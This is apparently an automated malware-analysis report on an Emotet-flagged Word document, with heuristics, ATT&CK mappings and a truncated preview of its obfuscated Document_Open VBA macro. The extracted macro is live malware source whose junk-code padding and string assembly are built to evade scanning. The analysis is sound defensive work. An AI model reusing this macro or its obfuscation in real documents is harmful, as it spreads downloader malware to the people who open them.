MALICIOUS
262
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1059 Command and Scripting Interpreter
The sample is a malicious Office document containing VBA macros, specifically a Document_Open macro that executes upon opening. Heuristics indicate obfuscation techniques and the use of CreateObject, consistent with downloader malware. ClamAV detection explicitly identifies it as Emotet, a known downloader family. The macro's obfuscated nature and use of 'winmgmts' suggest it attempts to interact with the system to download and execute a further stage.
Heuristics 7
-
ClamAV: Doc.Downloader.Emotet-7449735-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-7449735-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATIONVBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8856 bytes |
SHA-256: 1577c1d568822536a444e28f81a98059b1fb573c4fe2f00c29bf30a0d9a191ee |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Gybrspdiha"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Emgfizqg, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Select Case Ztybxqkfgnpa
Case Jwgvmytjrpzyf
ISxdk951 = AWN
FKNpk15B = 23
WPOtp5 = 2
Case 926
dLUG = Hex(UJetwZx + CDate(ywnRgL - Round(Vkufbginmahzu)))
bqmax1u = 6969
QnqF67ZsD = CLng(kXja6)
Case Whondoucgab
OZb = 6532
pPcg1diH = biJruQ0
AOni9uk0 = Round(Icyktgkc)
End Select
Select Case Pzodzstuw
Case Vidqpsgsb
ISxdk951 = AWN
FKNpk15B = 23
WPOtp5 = 2
Case 926
dLUG = Hex(UJetwZx + CDate(ywnRgL - Round(Fbxvsissnuemn)))
bqmax1u = 6969
QnqF67ZsD = CLng(kXja6)
Case Furzuujg
OZb = 6532
pPcg1diH = biJruQ0
AOni9uk0 = Round(Aklvwdvv)
End Select
Select Case Kbykkbby
Case Ctmtggzduw
ISxdk951 = AWN
FKNpk15B = 23
WPOtp5 = 2
Case 926
dLUG = Hex(UJetwZx + CDate(ywnRgL - Round(Slrkfruh)))
bqmax1u = 6969
QnqF67ZsD = CLng(kXja6)
Case Ztzlzckwlppif
OZb = 6532
pPcg1diH = biJruQ0
AOni9uk0 = Round(Vjflpbsgkjns)
End Select
Nadhrckphuqf
End Sub
Attribute VB_Name = "Xhzqqhabtevg"
Attribute VB_Base = "0{6BB59B57-C3D3-48E2-8980-70518F5AE909}{2D3737D1-1380-4259-AEDE-0E6F11680693}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Ldpntmcpzds"
Function Emodebakftfu()
Select Case Ohtpgmuaopcfo
Case Zvnovnwwwf
ISxdk951 = AWN
FKNpk15B = 23
WPOtp5 = 2
Case 926
dLUG = Hex(UJetwZx + CDate(ywnRgL - Round(Exbrjczugiz)))
bqmax1u = 6969
QnqF67ZsD = CLng(kXja6)
Case Mlrpqnyfmkbt
OZb = 6532
pPcg1diH = biJruQ0
AOni9uk0 = Round(Iskwjdypdm)
End Select
Njehuidmcz = Gybrspdiha.Emgfizqg
Select Case Uknsvyhf
Case Sqmalqwpbsf
ISxdk951 = AWN
FKNpk15B = 23
WPOtp5 = 2
Case 926
dLUG = Hex(UJetwZx + CDate(ywnRgL - Round(Omhjdenysr)))
bqmax1u = 6969
QnqF67ZsD = CLng(kXja6)
Case Ntsigpvodgz
OZb = 6532
pPcg1diH = biJruQ0
AOni9uk0 = Round(Kuncspwhz)
End Select
Ifkryojnpxxa = Njehuidmcz + Xhzqqhabtevg.Ajfouqcagetv + Xhzqqhabtevg.Ouideqycughy + Xhzqqhabtevg.Fvqitqists
Select Case Gnqzdpayx
Case Rfzcungdzsct
ISxdk951 = AWN
FKNpk15B = 23
WPOtp5 = 2
Case 926
dLUG = Hex(UJetwZx + CDate(ywnRgL - Round(Tuvqsogje)))
bqmax1u = 6969
QnqF67ZsD = CLng(kXja6)
Case Uxxisemz
OZb = 6532
pPcg1diH = biJruQ0
AOni9uk0 = Round(Ysozkwjuoeuxr)
End Select
Kwwqsjsxshesi = Ifkryojnpxxa + Xhzqqhabtevg.Uyojjsnugjtap + Xhzqqhabtevg.Kbjeqqojuth.ControlTipText
Select Case Ofilsvldcvlr
Case Kfppjpnhzlti
ISxdk951 = AWN
FKNpk15B = 23
WPOtp5 = 2
Case 926
dLUG = Hex(UJetwZx + CDate(ywnRgL - Round(Ieikvlflaztbn)))
bqmax1u = 6969
QnqF67ZsD = CLng(kXja6)
Case Vanbjdgtfqk
OZb = 6532
pPcg1diH = biJruQ0
AOni9uk0 = Round(Gxrkeouyn)
End Select
Emodebakftfu = Nsodzxxbeq + Kwwqsjsxshesi + Nsodzxxbeq
Select
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.